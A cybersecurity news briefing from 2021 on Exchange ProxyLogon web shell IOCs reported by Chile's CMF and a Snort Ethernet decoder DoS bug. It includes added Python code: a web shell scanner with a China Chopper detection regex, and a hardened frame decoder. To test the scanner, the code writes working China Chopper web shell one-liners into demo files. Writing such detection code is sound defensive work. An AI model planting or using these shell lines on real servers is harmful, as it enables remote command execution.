Blueliv Intelligence Briefing

Your cybersecurity news summary

Wednesday, May 12th, 2021

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

Microsoft Exchange attack IOCs shared by bank regulator in Chile

Chile's financial regulator, the Comisión para el Mercado Financiero (CMF), further states that it is investigating the breach and has been in contact with the Computer Security Incident Response Team (CSIRT) of the Ministry of Finance. While the file hashes in the indicators of compromise (IOCs) differ from victim to victim, the file names have often been the same: web shells named 'error_page.asp' and 'supp0rt.aspx' have appeared in numerous ProxyLogon attacks and are for the most part identical, with only a few victim-specific changes. Hashes alone are therefore weak indicators here; file names and content patterns carry across victims. The files are Exchange Offline Address Book (OAB) virtual directory configuration files whose ExternalUrl property has been set to China Chopper web shell code rather than a URL; when Exchange writes those settings to disk as an .aspx page, the page becomes a web shell that lets the threat actor execute commands on the compromised Exchange server remotely by sending HTTP requests to it.
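As an added example (not code from the briefing, CMF or Blueliv), the following Python script applies the two indicator types the advisory describes, the known file names and the China Chopper "eval of a request parameter" pattern, to a directory tree of ASP/ASPX files, and reports which indicator fired for each hit. The sample web root it builds under a temporary directory is constructed for the demonstration; the parameter name "cmd" and the owa/auth and ecp/auth locations are assumptions, not indicators from the advisory.

```python
import os
import re
import tempfile
from pathlib import Path
from typing import Dict, List

# File names reported by CMF and seen across other ProxyLogon intrusions.
KNOWN_SHELL_NAMES = {"error_page.asp", "supp0rt.aspx"}

# Content signature for the China Chopper ASPX family: server-side eval of a
# request parameter. A content match survives the per-victim edits that change
# the file hash, which is why it is checked in addition to the file name.
CHOPPER_EVAL = re.compile(r'eval\s*\(\s*Request(?:\.Item)?\s*\[', re.IGNORECASE)


def scan_file(path: Path) -> List[str]:
    """Return the indicator names that fire for one file (empty list = clean)."""
    findings: List[str] = []
    if path.name.lower() in KNOWN_SHELL_NAMES:
        findings.append("known-shell-filename")
    try:
        text = path.read_text(encoding="utf-8", errors="ignore")
    except OSError:
        return findings  # unreadable: report the name match, if any
    if CHOPPER_EVAL.search(text):
        findings.append("china-chopper-eval")
    return findings


def scan_tree(root: Path) -> Dict[str, List[str]]:
    """Walk root and report every .asp/.aspx file with at least one indicator."""
    hits: Dict[str, List[str]] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".asp", ".aspx")):
                continue
            path = Path(dirpath) / name
            findings = scan_file(path)
            if findings:
                hits[path.relative_to(root).as_posix()] = findings
    return hits


def build_demo_tree() -> Path:
    """Constructed sample web root (not a real capture): one clean page, one
    shell with the reported name, one renamed shell that only content catches.
    Paths and the "cmd" parameter name are assumptions for the demo."""
    root = Path(tempfile.mkdtemp(prefix="exchange-webroot-"))
    owa = root / "owa" / "auth"
    ecp = root / "ecp" / "auth"
    owa.mkdir(parents=True)
    ecp.mkdir(parents=True)
    (owa / "logon.aspx").write_text('<%@ Page Language="C#" %>\n<html>OWA logon</html>\n')
    # Shape of an OAB virtual directory export whose ExternalUrl holds shell code.
    (owa / "supp0rt.aspx").write_text(
        'http://f/<script language="JScript" runat="server">'
        'function Page_Load(){eval(Request["cmd"],"unsafe");}</script>'
    )
    # Same family under a different name: hash and name differ, content matches.
    (ecp / "help.aspx").write_text(
        '<%@ Page Language="Jscript"%><%eval(Request.Item["cmd"],"unsafe");%>'
    )
    return root


if __name__ == "__main__":
    for rel, why in sorted(scan_tree(build_demo_tree()).items()):
        print(f"{rel}: {', '.join(why)}")
```

Point it at the IIS and Exchange web roots of a suspect server (work from a copy of the tree if the host is under forensic investigation). The ExternalUrl property itself is inspected from the Exchange Management Shell with Get-OabVirtualDirectory | Format-List Identity,ExternalUrl; a value containing script tags instead of a plain https:// URL is an indicator on its own, and the .aspx file written from it remains on disk and functional even after the property has been reset, so the file scan is needed as well.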

Cisco Snort Ethernet Frame Decoder DoS vulnerability (CVE-2021-1285)

The vulnerability resides in the Ethernet Frame Decoder of the Snort detection engine. Tracked as CVE-2021-1285, it can be exploited by an unauthenticated, adjacent attacker (one on the same Layer 2 segment, since the trigger is a raw Ethernet frame rather than a routed packet) to cause a denial-of-service (DoS) condition by sending specially crafted Ethernet frames through an affected device. "The vulnerability is due to improper handling of error conditions when processing Ethernet frames. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device," reads the advisory published by Cisco.
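Cisco's advisory describes the bug class, not the code path, so the following is not Snort's decoder. It is an added Python example of a small Ethernet II / 802.1Q frame decoder written the way a detection engine's decoder has to be: every length is checked before the bytes are read, a malformed frame comes back as a DecodeError value rather than an exception that would take the engine down, and the VLAN-tag loop is bounded so a crafted frame can neither run the parser off the end of its buffer nor keep it looping. The frames in SAMPLES (a truncated VLAN tag, a runt, an over-nested tag stack, a bogus 802.3 length) are constructed for the demonstration, and the two-tag limit is an assumed policy, not Snort's.

```python
import struct
from typing import Dict, List, NamedTuple, Tuple, Union

ETHERTYPE_VLAN = 0x8100   # 802.1Q tag
ETHERTYPE_QINQ = 0x88A8   # 802.1ad outer tag
MIN_HEADER = 14           # dst(6) + src(6) + ethertype(2)
MAX_VLAN_TAGS = 2         # assumed policy: one tag or QinQ, nothing deeper


class Frame(NamedTuple):
    dst: str
    src: str
    vlan_ids: Tuple[int, ...]
    ethertype: int
    payload: bytes


class DecodeError(NamedTuple):
    reason: str
    offset: int           # byte offset at which decoding had to stop


def _mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def decode_ethernet(raw: bytes) -> Union[Frame, DecodeError]:
    """Decode one frame. Never raises on bad input: every read is bounds-checked
    first and a malformed frame is returned as a DecodeError value."""
    if len(raw) < MIN_HEADER:
        return DecodeError("frame shorter than Ethernet header", len(raw))
    dst, src = _mac(raw[0:6]), _mac(raw[6:12])
    ethertype = struct.unpack_from("!H", raw, 12)[0]
    off = MIN_HEADER
    vlans: List[int] = []
    # Each VLAN tag replaces the ethertype with TCI(2) + inner ethertype(2).
    while ethertype in (ETHERTYPE_VLAN, ETHERTYPE_QINQ):
        if len(vlans) >= MAX_VLAN_TAGS:
            return DecodeError("too many VLAN tags", off)
        if off + 4 > len(raw):
            return DecodeError("truncated VLAN tag", off)
        tci, ethertype = struct.unpack_from("!HH", raw, off)
        vlans.append(tci & 0x0FFF)
        off += 4
    if ethertype <= 0x05DC and ethertype > len(raw) - off:
        # Values up to 1500 are an 802.3 length field, not an EtherType, and
        # must not claim more payload than the frame actually carries.
        return DecodeError("802.3 length field exceeds frame", off)
    return Frame(dst, src, tuple(vlans), ethertype, raw[off:])


def decode_stream(frames) -> Tuple[List[Frame], List[DecodeError]]:
    """Decode a batch; bad frames are collected, not allowed to stop the run."""
    ok: List[Frame] = []
    bad: List[DecodeError] = []
    for raw in frames:
        result = decode_ethernet(raw)
        (ok if isinstance(result, Frame) else bad).append(result)
    return ok, bad


# Constructed sample frames (not captures): MACs and payloads are made up.
_HDR = bytes.fromhex("ffffffffffff" "001122334455")
SAMPLES: Dict[str, bytes] = {
    "ipv4": _HDR + bytes.fromhex("0800") + b"\x45" * 20,
    "vlan100_ipv4": _HDR + bytes.fromhex("8100 0064 0800") + b"\x45" * 20,
    "truncated_tag": _HDR + bytes.fromhex("8100 00"),
    "runt": b"\x00" * 10,
    "tag_nesting": _HDR + bytes.fromhex("8100 0001 8100 0002 8100 0003 0800"),
    "bad_8023_len": _HDR + bytes.fromhex("0100") + b"\xaa" * 8,
}

if __name__ == "__main__":
    good, bad = decode_stream(SAMPLES.values())
    for f in good:
        print(f"OK   type=0x{f.ethertype:04x} vlans={f.vlan_ids} payload={len(f.payload)}B")
    for e in bad:
        print(f"DROP {e.reason} at offset {e.offset}")
```

The design point is that the error path is a return value the caller can count and log, so a burst of crafted frames shows up as a spike in drops rather than as a crashed or restarting process.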